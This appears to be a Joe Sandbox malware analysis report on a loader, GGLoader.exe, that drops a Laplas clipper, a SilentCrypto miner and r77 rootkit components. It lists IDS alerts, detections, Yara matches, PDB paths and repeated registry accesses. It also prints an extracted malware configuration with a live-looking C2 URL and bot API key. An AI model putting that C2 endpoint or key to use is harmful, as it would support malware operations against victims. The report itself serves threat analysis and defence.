                        2024-10-04T19:13:18.950746+020020185811A Network Trojan was detected192.168.2.449730185.166.143.49443TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-10-04T19:13:20.612319+020028033053Unknown Traffic192.168.2.449731185.166.143.49443TCP
                        2024-10-04T19:13:22.132122+020028033053Unknown Traffic192.168.2.449732185.166.143.49443TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-10-04T19:13:59.781016+020028033043Unknown Traffic192.168.2.44973945.159.189.10580TCP
                        2024-10-04T19:14:01.488048+020028033043Unknown Traffic192.168.2.44974045.159.189.10580TCP
                        2024-10-04T19:14:57.437285+020028033043Unknown Traffic192.168.2.45000745.159.189.10580TCP
                        2024-10-04T19:14:59.158697+020028033043Unknown Traffic192.168.2.45000845.159.189.10580TCP

                        Joe Sandbox Signatures

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Antivirus / Scanner detection for submitted sample
                        Source: GGLoader.exeAvira: detected
                        Antivirus detection for dropped file
                        Source: C:\Program Files\Google\Chrome\updater.exeAvira: detection malicious, Label: HEUR/AGEN.1325648
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeAvira: detection malicious, Label: HEUR/AGEN.1317771
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exeAvira: detection malicious, Label: HEUR/AGEN.1319806
                        Source: C:\Users\user\AppData\Local\Temp\LicSend.exeAvira: detection malicious, Label: HEUR/AGEN.1325648
                        Found malware configuration
                        Source: svcupdater.exe.7904.35.memstrminMalware Configuration Extractor: Laplas Clipper {"C2 url": "http://45.159.189.105/bot/", "API key": "5ef1aac7b3430729f6cbc95fb4d2d2a62582e7382955ffc87026077cb28ab31e"}
                        Multi AV Scanner detection for dropped file
                        Source: C:\Program Files\Google\Chrome\updater.exeReversingLabs: Detection: 79%
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeReversingLabs: Detection: 79%
                        Source: C:\Users\user\AppData\Local\Temp\LicSend.exeReversingLabs: Detection: 79%
                        Source: C:\Users\user\AppData\Local\Temp\poduiwcd.tmpReversingLabs: Detection: 75%
                        Multi AV Scanner detection for submitted file
                        Source: GGLoader.exeReversingLabs: Detection: 76%
                        AI detected suspicious sample
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                        Machine Learning detection for dropped file
                        Source: C:\Program Files\Google\Chrome\updater.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Temp\LicenseGet.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Temp\poduiwcd.tmpJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Temp\LicSend.exeJoe Sandbox ML: detected
                        Machine Learning detection for sample
                        Source: GGLoader.exeJoe Sandbox ML: detected
                        Source: C:\Windows\System32\dialer.exeCode function: 37_2_00007FF790DC1000 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,37_2_00007FF790DC1000

                        Bitcoin Miner

                        barindex
                        Yara detected SilentCrypto Miner
                        Source: Yara matchFile source: 37.2.dialer.exe.7ff790dc0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 40.2.powershell.exe.1c51e800000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 7.2.LicSend.exe.7ff7d3ba5900.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 37.2.dialer.exe.7ff790dc60b0.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 40.2.powershell.exe.1c52eb9aeb0.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 38.2.powershell.exe.42cce80.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 40.2.powershell.exe.1c51e800000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 7.2.LicSend.exe.7ff7d3ba5900.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 40.2.powershell.exe.1c52eb9aeb0.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 37.2.dialer.exe.7ff790dc60b0.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 38.2.powershell.exe.42cce80.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 7.2.LicSend.exe.7ff7d3ba91b0.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 7.2.LicSend.exe.7ff7d3ba91b0.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 7.2.LicSend.exe.7ff7d3b90000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000028.00000002.2555004791.000001C52EB9A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000026.00000002.2339760412.00000000041A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000025.00000002.2178381779.00007FF790DC6000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000002.2175579159.00007FF7D3BA3000.00000004.00000001.01000000.0000000B.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000028.00000002.2236987878.000001C51E800000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: LicSend.exe PID: 7948, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 8068, type: MEMORYSTR
                        Source: GGLoader.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: unknownHTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.4:49730 version: TLS 1.2
                        Source: GGLoader.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbQZmW source: powershell.exe, 00000001.00000002.1955811622.000001EC48C05000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\wctAB5F.tmp.pdb source: svchost.exe, 00000034.00000000.2285237009.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2957094411.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000026.00000002.2367295184.0000000005B95000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\wct3D66.tmp.pdb source: svchost.exe, 00000034.00000002.2957703615.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000000.2285310844.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000034.00000000.2285098405.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2956162818.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: H:\CRYPTOCOIN\Mining\Miner\SilentCryptoMiner\r77-rootkit-master\Stager\obj\x64\Release\Stager.pdb source: LicSend.exe, 00000007.00000002.2175579159.00007FF7D3BA3000.00000004.00000001.01000000.0000000B.sdmp, powershell.exe, 00000026.00000002.2339760412.00000000041A9000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000034.00000002.2957703615.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000000.2285310844.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000034.00000000.2285098405.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2956162818.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\wmsetup.log.pdb source: svchost.exe, 00000034.00000000.2285237009.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2957094411.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: ore.pdb source: powershell.exe, 00000026.00000002.2367295184.0000000005B4C000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000034.00000002.2957703615.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000000.2285310844.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbD source: powershell.exe, 00000026.00000002.2367295184.0000000005B95000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000034.00000000.2285098405.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2956162818.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000001.00000002.1965111928.000001EC48EB5000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: mscorlib.pdb source: powershell.exe, 00000026.00000002.2213441971.0000000002851000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2367295184.0000000005B4C000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000034.00000000.2285237009.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2957094411.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000034.00000000.2285237009.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2957094411.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: tem.Core.pdb source: powershell.exe, 00000026.00000002.2367295184.0000000005B4C000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2.pdbr source: svchost.exe, 00000034.00000000.2285237009.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2957094411.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: t.Automation.pdb_ source: powershell.exe, 00000001.00000002.1951237178.000001EC48B7C000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\mscorlib.pdb23~W4 source: powershell.exe, 00000026.00000002.2367295184.0000000005B4C000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000034.00000002.2957703615.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000000.2285310844.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\mscorlib.pdb:3FW3 source: powershell.exe, 00000026.00000002.2367295184.0000000005B4C000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: System.Core.pdb source: powershell.exe, 00000028.00000002.2583801472.000001C536CC8000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: WINLOA~1.PDB source: svchost.exe, 00000034.00000000.2285237009.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2957094411.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000034.00000000.2285098405.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2956162818.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000034.00000002.2957703615.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000000.2285310844.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000034.00000000.2285237009.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2957094411.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb* source: svchost.exe, 00000034.00000002.2957703615.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000000.2285310844.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000034.00000002.2957703615.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000034.00000000.2285310844.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
                        Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                        Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                        Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                        Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                        Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                        Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                        Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                        Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                        Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                        Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                        Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
                        Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
                        Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                        Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
                        Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                        Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                        Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                        Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                        Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                        Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                        Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                        Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                        Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                        Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                        Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                        Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                        Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
                        Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
                        Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                        Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
                        Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                        Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                        Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                        Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                        Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                        Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                        Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                        Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                        Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                        Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                        Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                        Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                        Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
                        Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
                        Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                        Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
                        Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                        Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                        Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                        Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                        Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                        Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                        Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                        Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                        Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                        Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                        Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                        Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                        Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
                        Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
                        Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                        Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
                        Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                        Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                        Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                        Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                        Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                        Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                        Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                        Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                        Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                        Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                        Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                        Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                        Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
                        Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
                        Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                        Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
                        Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                        Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                        Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
